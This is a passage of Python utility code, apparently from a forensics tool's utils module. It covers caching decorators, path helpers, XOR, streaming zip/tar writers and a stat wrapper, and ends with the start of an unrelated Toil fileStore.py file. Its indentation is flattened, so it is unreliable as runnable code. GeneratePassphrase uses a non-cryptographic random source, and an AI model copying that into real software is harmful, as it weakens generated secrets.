f: The function which will be wrapped.
Returns:
A wrapped function which memoizes all values returned by f, keyed by
the arguments to f.
"""
f.memo_pad = {}
f.memo_deep_copy = self.deep_copy
@functools.wraps(f)
def Wrapped(self, *args, **kwargs):
# We keep args and kwargs separate to avoid confusing an arg which is a
# pair with a kwarg. Also, we don't try to match calls when an argument
# moves between args and kwargs.
key = tuple(args), tuple(sorted(kwargs.items(), key=lambda x: x[0]))
if key not in f.memo_pad:
f.memo_pad[key] = f(self, *args, **kwargs)
if f.memo_deep_copy:
return copy.deepcopy(f.memo_pad[key])
else:
return f.memo_pad[key]
return Wrapped
class MemoizeFunction(object):
"""A decorator to produce a memoizing version a function.
"""
def __init__(self, deep_copy=False):
"""Constructor.
Args:
deep_copy: Whether to perform a deep copy of the returned object.
Otherwise, a direct reference is returned.
"""
self.deep_copy = deep_copy
def __call__(self, f):
"""Produce a memoizing version of f.
    Requires that all parameters are hashable. Unless deep_copy is set, the
    return value is not copied, so changes to a returned object may be visible
    in future invocations.
Args:
f: The function which will be wrapped.
Returns:
A wrapped function which memoizes all values returned by f, keyed by
the arguments to f.
"""
f.memo_pad = {}
f.memo_deep_copy = self.deep_copy
@functools.wraps(f)
def Wrapped(*args, **kwargs):
key = tuple(args), tuple(sorted(kwargs.items(), key=lambda x: x[0]))
if key not in f.memo_pad:
f.memo_pad[key] = f(*args, **kwargs)
if f.memo_deep_copy:
return copy.deepcopy(f.memo_pad[key])
else:
return f.memo_pad[key]
return Wrapped
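# Illustrative use of the memoizing decorators (not part of the original
# module); ExpensiveLookup is a hypothetical function:
#
#   @MemoizeFunction()
#   def ExpensiveLookup(name):
#     ...  # evaluated once per distinct `name`
#
# Memoize() is the equivalent for instance methods; pass deep_copy=True to
# either decorator if callers may mutate the returned value.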
class AgeBasedCache(TimeBasedCache):
"""A cache which holds objects for a maximum length of time.
This differs from the TimeBasedCache which keeps the objects alive as long as
they are accessed.
"""
@Synchronized
def Get(self, key):
now = time.time()
stored = FastStore.Get(self, key)
if stored[0] + self.max_age < now:
raise KeyError("Expired")
return stored[1]
class Struct(object):
"""A baseclass for parsing binary Structs."""
# Derived classes must initialize this into an array of (format,
# name) tuples.
_fields = None
def __init__(self, data):
"""Parses ourselves from data."""
format_str = "".join([x[0] for x in self._fields])
self.size = struct.calcsize(format_str)
try:
parsed_data = struct.unpack(format_str, data[:self.size])
except struct.error:
raise RuntimeError("Unable to parse")
for i in range(len(self._fields)):
setattr(self, self._fields[i][1], parsed_data[i])
def __repr__(self):
"""Produce useful text representation of the Struct."""
dat = []
for _, name in self._fields:
dat.append("%s=%s" % (name, getattr(self, name)))
return "%s(%s)" % (self.__class__.__name__, ", ".join(dat))
@classmethod
def GetSize(cls):
"""Calculate the size of the struct."""
format_str = "".join([x[0] for x in cls._fields])
return struct.calcsize(format_str)
def GroupBy(items, key):
"""A generator that groups all items by a key.
Args:
items: A list of items or a single item.
key: A function which given each item will return the key.
Returns:
A dict with keys being each unique key and values being a list of items of
that key.
"""
key_map = {}
# Make sure we are given a sequence of items here.
try:
item_iter = iter(items)
except TypeError:
item_iter = [items]
for item in item_iter:
key_id = key(item)
key_map.setdefault(key_id, []).append(item)
return key_map
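# Example: GroupBy([1, 2, 3, 4], key=lambda x: x % 2) returns
# {1: [1, 3], 0: [2, 4]}; a single non-iterable item is treated as one group.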
def SmartStr(string):
"""Returns a string or encodes a unicode object.
This function essentially will always return an encoded string. It should be
used on an interface to the system which must accept a string and not unicode.
Args:
string: The string to convert.
Returns:
an encoded string.
"""
if type(string) == unicode: # pylint: disable=unidiomatic-typecheck
return string.encode("utf8", "ignore")
return str(string)
def SmartUnicode(string):
"""Returns a unicode object.
This function will always return a unicode object. It should be used to
guarantee that something is always a unicode object.
Args:
string: The string to convert.
Returns:
a unicode object.
"""
if type(string) != unicode: # pylint: disable=unidiomatic-typecheck
try:
return string.__unicode__()
except (AttributeError, UnicodeError):
return str(string).decode("utf8", "ignore")
return string
def Xor(string, key):
"""Returns a string where each character has been xored with key."""
return "".join([chr(c ^ key) for c in bytearray(string)])
def XorByteArray(arr, key):
"""Xors every item in the array with key and returns it."""
for i in xrange(len(arr)):
arr[i] ^= key
return arr
def FormatAsHexString(num, width=None, prefix="0x"):
"""Takes an int and returns the number formatted as a hex string."""
# Strip "0x".
hex_str = hex(num)[2:]
# Strip "L" for long values.
hex_str = hex_str.replace("L", "")
if width:
hex_str = hex_str.rjust(width, "0")
return "%s%s" % (prefix, hex_str)
def FormatAsTimestamp(timestamp):
if not timestamp:
return "-"
return time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(timestamp))
def NormalizePath(path, sep="/"):
"""A sane implementation of os.path.normpath.
  The standard implementation treats leading / and // as different, leading to
  incorrect normal forms.
  NOTE: It's OK to use a relative path here (without a leading /), but any /../
  will still be removed, anchoring the path at the top level (e.g.
  foo/../../../../bar => bar).
Args:
path: The path to normalize.
sep: Separator used.
Returns:
A normalized path. In this context normalized means that all input paths
that would result in the system opening the same physical file will produce
the same normalized path.
"""
if not path:
return sep
path = SmartUnicode(path)
path_list = path.split(sep)
# This is a relative path and the first element is . or ..
if path_list[0] in [".", "..", ""]:
path_list.pop(0)
# Deliberately begin at index 1 to preserve a single leading /
i = 0
while True:
list_len = len(path_list)
# We begin at the last known good position so we never iterate over path
# elements which are already examined
for i in range(i, len(path_list)):
# Remove /./ form
if path_list[i] == "." or not path_list[i]:
path_list.pop(i)
break
# Remove /../ form
elif path_list[i] == "..":
path_list.pop(i)
# Anchor at the top level
if (i == 1 and path_list[0]) or i > 1:
i -= 1
path_list.pop(i)
break
# If we didnt alter the path so far we can quit
if len(path_list) == list_len:
return sep + sep.join(path_list)
def JoinPath(stem="", *parts):
"""A sane version of os.path.join.
  The intention here is to append the parts to the stem. The standard
  os.path.join discards the accumulated path whenever a component begins with
  a /.
Args:
stem: The stem to join to.
*parts: parts of the path to join. The first arg is always the root and
directory traversal is not allowed.
Returns:
a normalized path.
"""
# Ensure all path components are unicode
parts = [SmartUnicode(path) for path in parts]
result = (stem + NormalizePath(u"/".join(parts))).replace("//", "/")
result = result.rstrip("/")
return result or "/"
def ShellQuote(value):
"""Escapes the string for the safe use inside shell command line."""
# TODO(user): replace pipes.quote with shlex.quote when time comes.
return pipes.quote(SmartUnicode(value))
def Join(*parts):
"""Join (AFF4) paths without normalizing.
A quick join method that can be used to express the precondition that
the parts are already normalized.
Args:
*parts: The parts to join
Returns:
The joined path.
"""
return "/".join(parts)
def Grouper(iterable, n):
"""Group iterable into lists of size n. Last list will be short."""
items = []
for count, item in enumerate(iterable):
items.append(item)
if (count + 1) % n == 0:
yield items
items = []
if items:
yield items
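# Example: list(Grouper(range(5), 2)) yields [[0, 1], [2, 3], [4]].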
def EncodeReasonString(reason):
return base64.urlsafe_b64encode(SmartStr(reason))
def DecodeReasonString(reason):
return SmartUnicode(base64.urlsafe_b64decode(SmartStr(reason)))
# Regex chars that should not be in a regex
disallowed_chars = re.compile(r"[[\](){}+*?.$^\\]")
def EscapeRegex(string):
return re.sub(disallowed_chars, lambda x: "\\" + x.group(0),
SmartUnicode(string))
def GeneratePassphrase(length=20):
"""Create a 20 char passphrase with easily typeable chars."""
valid_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
valid_chars += "0123456789 ,-_&$#"
return "".join(random.choice(valid_chars) for i in range(length))
def PassphraseCallback(verify=False,
prompt1="Enter passphrase:",
prompt2="Verify passphrase:"):
"""A utility function to read a passphrase from stdin."""
while 1:
try:
p1 = getpass.getpass(prompt1)
if verify:
p2 = getpass.getpass(prompt2)
if p1 == p2:
break
else:
break
except KeyboardInterrupt:
return None
return p1
class PRNG(object):
"""An optimized PRNG."""
random_list = []
@classmethod
def GetUShort(cls):
return cls.GetULong() & 0xFFFF
@classmethod
def GetULong(cls):
while True:
try:
return cls.random_list.pop()
except IndexError:
PRNG.random_list = list(
struct.unpack("=" + "L" * 1000,
os.urandom(struct.calcsize("=L") * 1000)))
def FormatNumberAsString(num):
"""Return a large number in human readable form."""
for suffix in ["b", "KB", "MB", "GB"]:
if num < 1024.0:
return "%3.2f%s" % (num, suffix)
num /= 1024.0
return "%3.1f%s" % (num, "TB")
class NotAValue(object):
pass
class HeartbeatQueue(Queue.Queue):
"""A queue that periodically calls a provided callback while waiting."""
def __init__(self, callback=None, fast_poll_time=60, *args, **kw):
Queue.Queue.__init__(self, *args, **kw)
self.callback = callback or (lambda: None)
self.last_item_time = time.time()
self.fast_poll_time = fast_poll_time
def get(self, poll_interval=5):
while True:
try:
# Using Queue.get() with a timeout is really expensive - Python uses
# busy waiting that wakes up the process every 50ms - so we switch
# to a more efficient polling method if there is no activity for
# <fast_poll_time> seconds.
if time.time() - self.last_item_time < self.fast_poll_time:
message = Queue.Queue.get(self, block=True, timeout=poll_interval)
else:
time.sleep(poll_interval)
message = Queue.Queue.get(self, block=False)
break
except Queue.Empty:
self.callback()
self.last_item_time = time.time()
return message
class RollingMemoryStream(object):
"""Append-only memory stream that allows writing data in chunks."""
def __init__(self):
self._stream = cStringIO.StringIO()
self._offset = 0
def write(self, b): # pylint: disable=invalid-name
if not self._stream:
raise ArchiveAlreadyClosedError("Attempting to write to a closed stream.")
self._stream.write(b)
self._offset += len(b)
def flush(self): # pylint: disable=invalid-name
pass
def tell(self): # pylint: disable=invalid-name
return self._offset
def close(self): # pylint: disable=invalid-name
self._stream = None
def GetValueAndReset(self):
"""Gets stream buffer since the last GetValueAndReset() call."""
if not self._stream:
raise ArchiveAlreadyClosedError(
"Attempting to get a value from a closed stream.")
value = self._stream.getvalue()
self._stream.seek(0)
self._stream.truncate()
return value
class ArchiveAlreadyClosedError(Error):
pass
class StreamingZipGenerator(object):
"""A streaming zip generator that can archive file-like objects."""
FILE_CHUNK_SIZE = 1024 * 1024 * 4
def __init__(self, compression=zipfile.ZIP_STORED):
self._stream = RollingMemoryStream()
self._zip_fd = zipfile.ZipFile(
self._stream, mode="w", compression=compression, allowZip64=True)
self._compression = compression
self._ResetState()
def _ResetState(self):
self.cur_zinfo = None
self.cur_file_size = 0
self.cur_compress_size = 0
self.cur_cmpr = None
self.cur_crc = 0
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Close()
def _GenerateZipInfo(self, arcname=None, compress_type=None, st=None):
"""Generate ZipInfo instance for the given name, compression and stat.
Args:
arcname: The name in the archive this should take.
compress_type: Compression type (zipfile.ZIP_DEFLATED, or ZIP_STORED)
st: An optional stat object to be used for setting headers.
Returns:
ZipInfo instance.
Raises:
ValueError: If arcname is not provided.
"""
# Fake stat response.
if st is None:
st = os.stat_result((0100644, 0, 0, 0, 0, 0, 0, 0, 0, 0))
mtime = time.localtime(st.st_mtime or time.time())
date_time = mtime[0:6]
# Create ZipInfo instance to store file information
if arcname is None:
raise ValueError("An arcname must be provided.")
zinfo = zipfile.ZipInfo(arcname, date_time)
zinfo.external_attr = (st[0] & 0xFFFF) << 16L # Unix attributes
if compress_type is None:
zinfo.compress_type = self._compression
else:
zinfo.compress_type = compress_type
zinfo.file_size = 0
zinfo.compress_size = 0
zinfo.flag_bits = 0x08 # Setting data descriptor flag.
zinfo.CRC = 0x08074b50 # Predefined CRC for archives using data
# descriptors.
# This fills an empty Info-ZIP Unix extra field.
zinfo.extra = struct.pack(
"<HHIIHH",
0x5855,
12,
0, # time of last access (UTC/GMT)
0, # time of last modification (UTC/GMT)
0, # user ID
0) # group ID
return zinfo
def WriteSymlink(self, src_arcname, dst_arcname):
"""Writes a symlink into the archive."""
# Inspired by:
# http://www.mail-archive.com/python-list@python.org/msg34223.html
if not self._stream:
raise ArchiveAlreadyClosedError(
"Attempting to write to a ZIP archive that was already closed.")
src_arcname = SmartStr(src_arcname)
dst_arcname = SmartStr(dst_arcname)
zinfo = zipfile.ZipInfo(dst_arcname)
# This marks a symlink.
zinfo.external_attr = (0644 | 0120000) << 16
# This marks create_system as UNIX.
zinfo.create_system = 3
# This fills the ASi UNIX extra field, see:
# http://www.opensource.apple.com/source/zip/zip-6/unzip/unzip/proginfo/extra.fld
zinfo.extra = struct.pack(
"<HHIHIHHs",
0x756e,
len(src_arcname) + 14,
0, # CRC-32 of the remaining data
0120000, # file permissions
0, # target file size
0, # user ID
0, # group ID
src_arcname)
self._zip_fd.writestr(zinfo, src_arcname)
return self._stream.GetValueAndReset()
def WriteFileHeader(self, arcname=None, compress_type=None, st=None):
"""Writes a file header."""
if not self._stream:
raise ArchiveAlreadyClosedError(
"Attempting to write to a ZIP archive that was already closed.")
self.cur_zinfo = self._GenerateZipInfo(
arcname=arcname, compress_type=compress_type, st=st)
self.cur_file_size = 0
self.cur_compress_size = 0
if self.cur_zinfo.compress_type == zipfile.ZIP_DEFLATED:
self.cur_cmpr = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION,
zlib.DEFLATED, -15)
else:
self.cur_cmpr = None
self.cur_crc = 0
if not self._stream:
raise ArchiveAlreadyClosedError(
"Attempting to write to a ZIP archive that was already closed.")
self.cur_zinfo.header_offset = self._stream.tell()
# Call _writeCheck(self.cur_zinfo) to do sanity checking on zinfo structure
# that we've constructed.
self._zip_fd._writecheck(self.cur_zinfo) # pylint: disable=protected-access
# Mark ZipFile as dirty. We have to keep self._zip_fd's internal state
# coherent so that it behaves correctly when close() is called.
self._zip_fd._didModify = True # pylint: disable=protected-access
# Write FileHeader now. It's incomplete, but CRC and uncompressed/compressed
# sized will be written later in data descriptor.
self._stream.write(self.cur_zinfo.FileHeader())
return self._stream.GetValueAndReset()
def WriteFileChunk(self, chunk):
"""Writes file chunk."""
if not self._stream:
raise ArchiveAlreadyClosedError(
"Attempting to write to a ZIP archive that was already closed.")
self.cur_file_size += len(chunk)
self.cur_crc = zipfile.crc32(chunk, self.cur_crc) & 0xffffffff
if self.cur_cmpr:
chunk = self.cur_cmpr.compress(chunk)
self.cur_compress_size += len(chunk)
self._stream.write(chunk)
return self._stream.GetValueAndReset()
def WriteFileFooter(self):
"""Writes the file footer (finished the file)."""
if not self._stream:
raise ArchiveAlreadyClosedError(
"Attempting to write to a ZIP archive that was already closed.")
if self.cur_cmpr:
buf = self.cur_cmpr.flush()
self.cur_compress_size += len(buf)
self.cur_zinfo.compress_size = self.cur_compress_size
self._stream.write(buf)
else:
self.cur_zinfo.compress_size = self.cur_file_size
self.cur_zinfo.CRC = self.cur_crc
self.cur_zinfo.file_size = self.cur_file_size
    # The data descriptor written below has 4-byte size fields, so it cannot
    # represent a member larger than 4 GB. The ZIP64 convention is to write
    # 0xffffffff for the compressed and uncompressed size in those cases. The
    # actual size is written by the library for us anyways so those fields are
    # redundant.
cur_file_size = min(0xffffffff, self.cur_file_size)
cur_compress_size = min(0xffffffff, self.cur_compress_size)
    # Write the data descriptor. We never know how large the archive may
    # become as we're generating it dynamically.
    #
    # crc-32              4 bytes (little endian)
    # compressed size     4 bytes (little endian)
    # uncompressed size   4 bytes (little endian)
self._stream.write(
struct.pack("<LLL", self.cur_crc, cur_compress_size, cur_file_size))
# Register the file in the zip file, so that central directory gets
# written correctly.
self._zip_fd.filelist.append(self.cur_zinfo)
self._zip_fd.NameToInfo[self.cur_zinfo.filename] = self.cur_zinfo
self._ResetState()
return self._stream.GetValueAndReset()
@property
def is_file_write_in_progress(self):
return self.cur_zinfo
def WriteFromFD(self, src_fd, arcname=None, compress_type=None, st=None):
"""Write a zip member from a file like object.
Args:
src_fd: A file like object, must support seek(), tell(), read().
arcname: The name in the archive this should take.
compress_type: Compression type (zipfile.ZIP_DEFLATED, or ZIP_STORED)
st: An optional stat object to be used for setting headers.
Raises:
      ArchiveAlreadyClosedError: If the zip is already closed.
Yields:
Chunks of binary data.
"""
yield self.WriteFileHeader(
arcname=arcname, compress_type=compress_type, st=st)
while 1:
buf = src_fd.read(1024 * 1024)
if not buf:
break
yield self.WriteFileChunk(buf)
yield self.WriteFileFooter()
def Close(self):
self._zip_fd.close()
value = self._stream.GetValueAndReset()
self._stream.close()
return value
@property
def output_size(self):
return self._stream.tell()
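# Illustrative sketch (not part of the original module; relies on the
# module-level `os` and `zipfile` imports): drive StreamingZipGenerator by hand
# and forward every produced chunk, e.g. to a socket or an HTTP response.
# `send_chunk` is a hypothetical callback supplied by the caller.
def _ExampleStreamZipChunks(src_path, send_chunk):
  gen = StreamingZipGenerator(compression=zipfile.ZIP_DEFLATED)
  with open(src_path, "rb") as src:
    for chunk in gen.WriteFromFD(src, arcname=os.path.basename(src_path),
                                 st=os.stat(src_path)):
      send_chunk(chunk)
  # Close() emits the remaining bytes, including the central directory.
  send_chunk(gen.Close())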
class StreamingZipWriter(object):
"""A streaming zip file writer which can copy from file like objects.
The streaming writer should be capable of compressing files of arbitrary
size without eating all the memory. It's built on top of Python's zipfile
module, but has to use some hacks, as standard library doesn't provide
all the necessary API to do streaming writes.
"""
def __init__(self, fd_or_path, mode="wb", compression=zipfile.ZIP_STORED):
"""Open streaming ZIP file with mode read "r", write "w" or append "a".
Args:
fd_or_path: Either the path to the file, or a file-like object.
If it is a path, the file will be opened and closed by
ZipFile.
mode: The mode can be either read "r", write "w" or append "a".
compression: ZIP_STORED (no compression) or ZIP_DEFLATED (requires zlib).
"""
if hasattr(fd_or_path, "write"):
self._fd = fd_or_path
else:
self._fd = open(fd_or_path, mode)
self._generator = StreamingZipGenerator(compression=compression)
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Close()
def Close(self):
self._fd.write(self._generator.Close())
def WriteSymlink(self, src_arcname, dst_arcname):
"""Writes a symlink into the archive."""
self._fd.write(self._generator.WriteSymlink(src_arcname, dst_arcname))
def WriteFromFD(self, src_fd, arcname=None, compress_type=None, st=None):
"""Write a zip member from a file like object.
Args:
src_fd: A file like object, must support seek(), tell(), read().
arcname: The name in the archive this should take.
compress_type: Compression type (zipfile.ZIP_DEFLATED, or ZIP_STORED)
st: An optional stat object to be used for setting headers.
Raises:
      ArchiveAlreadyClosedError: If the zip is already closed.
"""
for chunk in self._generator.WriteFromFD(
src_fd, arcname=arcname, compress_type=compress_type, st=st):
self._fd.write(chunk)
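# A minimal usage sketch (illustrative only; the paths are placeholders):
# StreamingZipWriter feeds the generator above and writes every chunk straight
# to the supplied file object, so large members never sit fully in memory.
def _ExampleWriteZip(src_path, dst_path):
  with open(dst_path, "wb") as out_fd:
    with StreamingZipWriter(out_fd, compression=zipfile.ZIP_DEFLATED) as writer:
      with open(src_path, "rb") as src:
        writer.WriteFromFD(src, arcname=os.path.basename(src_path),
                           st=os.stat(src_path))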
class StreamingTarGenerator(object):
"""A streaming tar generator that can archive file-like objects."""
FILE_CHUNK_SIZE = 1024 * 1024 * 4
def __init__(self):
super(StreamingTarGenerator, self).__init__()
self._stream = RollingMemoryStream()
self._tar_fd = tarfile.open(
mode="w:gz", fileobj=self._stream, encoding="utf-8")
self._ResetState()
def _ResetState(self):
self.cur_file_size = 0
self.cur_info = None
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Close()
def Close(self):
self._tar_fd.close()
value = self._stream.GetValueAndReset()
self._stream.close()
return value
def WriteSymlink(self, src_arcname, dst_arcname):
"""Writes a symlink into the archive."""
info = self._tar_fd.tarinfo()
info.tarfile = self._tar_fd
info.name = SmartStr(dst_arcname)
info.size = 0
info.mtime = time.time()
info.type = tarfile.SYMTYPE
info.linkname = SmartStr(src_arcname)
self._tar_fd.addfile(info)
return self._stream.GetValueAndReset()
def WriteFileHeader(self, arcname=None, st=None):
"""Writes file header."""
if st is None:
raise ValueError("Stat object can't be None.")
self.cur_file_size = 0
self.cur_info = self._tar_fd.tarinfo()
self.cur_info.tarfile = self._tar_fd
self.cur_info.type = tarfile.REGTYPE
self.cur_info.name = SmartStr(arcname)
self.cur_info.size = st.st_size
self.cur_info.mode = st.st_mode
self.cur_info.mtime = st.st_mtime or time.time()
self._tar_fd.addfile(self.cur_info)
return self._stream.GetValueAndReset()
def WriteFileChunk(self, chunk):
"""Writes file chunk."""
self._tar_fd.fileobj.write(chunk)
self.cur_file_size += len(chunk)
return self._stream.GetValueAndReset()
def WriteFileFooter(self):
"""Writes file footer (finishes the file)."""
if self.cur_file_size != self.cur_info.size:
raise IOError("Incorrect file size: st_size=%d, but written %d bytes." %
(self.cur_info.size, self.cur_file_size))
blocks, remainder = divmod(self.cur_file_size, tarfile.BLOCKSIZE)
if remainder > 0:
self._tar_fd.fileobj.write(tarfile.NUL * (tarfile.BLOCKSIZE - remainder))
blocks += 1
self._tar_fd.offset += blocks * tarfile.BLOCKSIZE
self._ResetState()
return self._stream.GetValueAndReset()
@property
def is_file_write_in_progress(self):
return self.cur_info
def WriteFromFD(self, src_fd, arcname=None, st=None):
"""Write an archive member from a file like object.
Args:
src_fd: A file like object, must support seek(), tell(), read().
arcname: The name in the archive this should take.
st: A stat object to be used for setting headers.
Raises:
ValueError: If st is omitted.
ArchiveAlreadyClosedError: If the archive was already closed.
IOError: if file size reported in st is different from the one that
was actually read from the src_fd.
Yields:
Chunks of binary data.
"""
yield self.WriteFileHeader(arcname=arcname, st=st)
while 1:
buf = src_fd.read(1024 * 1024)
if not buf:
break
yield self.WriteFileChunk(buf)
yield self.WriteFileFooter()
@property
def output_size(self):
return self._stream.tell()
class StreamingTarWriter(object):
"""A streaming tar file writer which can copy from file like objects.
The streaming writer should be capable of compressing files of arbitrary
size without eating all the memory. It's built on top of Python's tarfile
module.
"""
def __init__(self, fd_or_path, mode="w"):
if hasattr(fd_or_path, "write"):
self.tar_fd = tarfile.open(
mode=mode, fileobj=fd_or_path, encoding="utf-8")
else:
self.tar_fd = tarfile.open(name=fd_or_path, mode=mode, encoding="utf-8")
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Close()
def Close(self):
self.tar_fd.close()
def WriteSymlink(self, src_arcname, dst_arcname):
"""Writes a symlink into the archive."""
info = self.tar_fd.tarinfo()
info.tarfile = self.tar_fd
info.name = SmartStr(dst_arcname)
info.size = 0
info.mtime = time.time()
info.type = tarfile.SYMTYPE
info.linkname = SmartStr(src_arcname)
self.tar_fd.addfile(info)
def WriteFromFD(self, src_fd, arcname=None, st=None):
"""Write an archive member from a file like object.
Args:
src_fd: A file like object, must support seek(), tell(), read().
arcname: The name in the archive this should take.
st: A stat object to be used for setting headers.
Raises:
ValueError: If st is omitted.
"""
if st is None:
raise ValueError("Stat object can't be None.")
info = self.tar_fd.tarinfo()
info.tarfile = self.tar_fd
info.type = tarfile.REGTYPE
info.name = SmartStr(arcname)
info.size = st.st_size
info.mode = st.st_mode
info.mtime = st.st_mtime or time.time()
self.tar_fd.addfile(info, src_fd)
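# A minimal usage sketch (illustrative only): stream a file into a
# gzip-compressed tar archive. The stat result supplies the member's size,
# mode and mtime headers, as WriteFromFD requires.
def _ExampleWriteTar(src_path, dst_path):
  with StreamingTarWriter(dst_path, mode="w:gz") as writer:
    with open(src_path, "rb") as src:
      writer.WriteFromFD(src, arcname=os.path.basename(src_path),
                         st=os.stat(src_path))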
class Stubber(object):
"""A context manager for doing simple stubs."""
def __init__(self, module, target_name, stub):
self.target_name = target_name
self.module = module
self.stub = stub
def __enter__(self):
self.Start()
def Stop(self):
setattr(self.module, self.target_name, self.old_target)
def Start(self):
self.old_target = getattr(self.module, self.target_name, None)
try:
self.stub.old_target = self.old_target
except AttributeError:
pass
setattr(self.module, self.target_name, self.stub)
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Stop()
class MultiStubber(object):
"""A context manager for doing simple stubs."""
def __init__(self, *args):
self.stubbers = [Stubber(*x) for x in args]
def Start(self):
for x in self.stubbers:
x.Start()
def Stop(self):
for x in self.stubbers:
x.Stop()
def __enter__(self):
self.Start()
def __exit__(self, t, value, traceback):
self.Stop()
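# A small sketch of how Stubber is meant to be used in tests (illustrative
# only; relies on the module-level `time` import): the attribute is swapped on
# entry and restored on exit.
def _ExampleStubTime():
  with Stubber(time, "time", lambda: 0.0):
    assert time.time() == 0.0
  # Outside the context manager the original time.time is back in place.
  return time.time()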
class DataObject(dict):
"""This class wraps a dict and provides easier access functions."""
def Register(self, item, value=None):
if item in self:
raise AttributeError("Item %s already registered." % item)
self[item] = value
def __setattr__(self, item, value):
self[item] = value
def __getattr__(self, item):
try:
return self[item]
except KeyError as e:
raise AttributeError(e)
def __dir__(self):
return sorted(self.keys()) + dir(self.__class__)
def __str__(self):
result = []
for k, v in self.items():
tmp = " %s = " % k
try:
for line in SmartUnicode(v).splitlines():
tmp += " %s\n" % line
except Exception as e: # pylint: disable=broad-except
tmp += "Error: %s\n" % e
result.append(tmp)
return "{\n%s}\n" % "".join(result)
def EnsureDirExists(path):
"""Equivalent of makedir -p."""
try:
os.makedirs(path)
except OSError as exc:
# Necessary so we don't hide other errors such as permission denied.
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def ResolveHostnameToIP(host, port):
ip_addrs = socket.getaddrinfo(host, port, socket.AF_UNSPEC, 0,
socket.IPPROTO_TCP)
# getaddrinfo returns tuples (family, socktype, proto, canonname, sockaddr).
# We are interested in sockaddr which is in turn a tuple
# (address, port) for IPv4 or (address, port, flow info, scope id)
# for IPv6. In both cases, we want the first element, the address.
return ip_addrs[0][4][0]
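# Illustrative only: ResolveHostnameToIP returns the first address reported by
# the resolver, so the concrete value ("127.0.0.1", "::1", ...) depends on the
# local configuration.
def _ExampleResolveLocalhost():
  return ResolveHostnameToIP("localhost", 80)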
# TODO(hanuszczak): This module is way too big right now. It should be split
# into several smaller ones (such as `util.paths`, `util.collections` etc.).
class Stat(object):
"""A wrapper around standard `os.[l]stat` function.
The standard API for using `stat` results is very clunky and unpythonic.
This is an attempt to create a more familiar and consistent interface to make
the code look cleaner.
Moreover, standard `stat` does not properly support extended flags - even
though the documentation mentions that `stat.st_flags` should work on macOS
and Linux it works only on macOS and raises an error on Linux (and Windows).
This class handles that and fetches these flags lazily (as it can be costly
operation on Linux).
Args:
path: A path to the file to perform `stat` on.
follow_symlink: True if `stat` of a symlink should be returned instead of a
file that it points to. For non-symlinks this setting has no effect.
"""
def __init__(self, path, follow_symlink=True):
self._path = path
if not follow_symlink:
self._stat = os.lstat(path)
else:
self._stat = os.stat(path)
self._flags_linux = None
self._flags_osx = None
def GetRaw(self):
return self._stat
def GetLinuxFlags(self):
if self._flags_linux is None:
self._flags_linux = self._FetchLinuxFlags()
return self._flags_linux
def GetOsxFlags(self):
if self._flags_osx is None:
self._flags_osx = self._FetchOsxFlags()
return self._flags_osx
def GetSize(self):
return self._stat.st_size
def GetAccessTime(self):
return self._stat.st_atime
def GetModificationTime(self):
return self._stat.st_mtime
def GetChangeTime(self):
return self._stat.st_ctime
def GetDevice(self):
return self._stat.st_dev
def IsDirectory(self):
return stat.S_ISDIR(self._stat.st_mode)
def IsRegular(self):
return stat.S_ISREG(self._stat.st_mode)
def IsSocket(self):
return stat.S_ISSOCK(self._stat.st_mode)
def IsSymlink(self):
return stat.S_ISLNK(self._stat.st_mode)
# http://manpages.courier-mta.org/htmlman2/ioctl_list.2.html
FS_IOC_GETFLAGS = 0x80086601
def _FetchLinuxFlags(self):
"""Fetches Linux extended file flags."""
if platform.system() != "Linux":
return 0
# Since we open a file in the next step we do not want to open a symlink.
# `lsattr` returns an error when trying to check flags of a symlink, so we
# assume that symlinks cannot have them.
if self.IsSymlink():
return 0
# Some files (e.g. sockets) cannot be opened. For these we do not really
# care about extended flags (they should have none). `lsattr` does not seem
# to support such cases anyway. It is also possible that a file has been
# deleted (because this method is used lazily).
try:
fd = os.open(self._path, os.O_RDONLY)
except (IOError, OSError):
return 0
try:
# This import is Linux-specific.
import fcntl # pylint: disable=g-import-not-at-top
buf = array.array("l", [0])
fcntl.ioctl(fd, self.FS_IOC_GETFLAGS, buf)
return buf[0]
except (IOError, OSError):
# File system does not support extended attributes.
return 0
finally:
os.close(fd)
def _FetchOsxFlags(self):
"""Fetches macOS extended file flags."""
if platform.system() != "Darwin":
return 0
return self._stat.st_flags
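# A short usage sketch (illustrative only, the path is a placeholder): extended
# file flags are fetched lazily, so constructing Stat stays cheap when the
# flags are never requested.
def _ExampleStat(path):
  s = Stat(path, follow_symlink=False)
  return s.GetSize(), s.IsDirectory(), s.GetLinuxFlags()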
fileStore.py
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import str
from builtins import range
from builtins import object
from abc import abstractmethod, ABCMeta
from collections import namedtuple, defaultdict
from contextlib import contextmanager
from fcntl import flock, LOCK_EX, LOCK_UN
from functools import partial
from hashlib import sha1
from threading import Thread, Semaphore, Event
from future.utils import with_metaclass
from six.moves.queue import Empty, Queue
import base64
import dill
import errno
import logging
import os
import shutil
import stat
import tempfile
import time
import uuid
from toil.lib.objects import abstractclassmethod
from toil.lib.humanize import bytes2human
from toil.common import cacheDirName, getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.resource import ModuleDescriptor
logger = logging.getLogger(__name__)
class DeferredFunction(namedtuple('DeferredFunction', 'function args kwargs name module')):
"""
>>> df = DeferredFunction.create(defaultdict, None, {'x':1}, y=2)
>>> df
DeferredFunction(defaultdict, ...)
>>> df.invoke() == defaultdict(None, x=1, y=2)
True
"""
@classmethod
def create(cls, function, *args, **kwargs):
"""
Capture the given callable and arguments as an instance of this class.
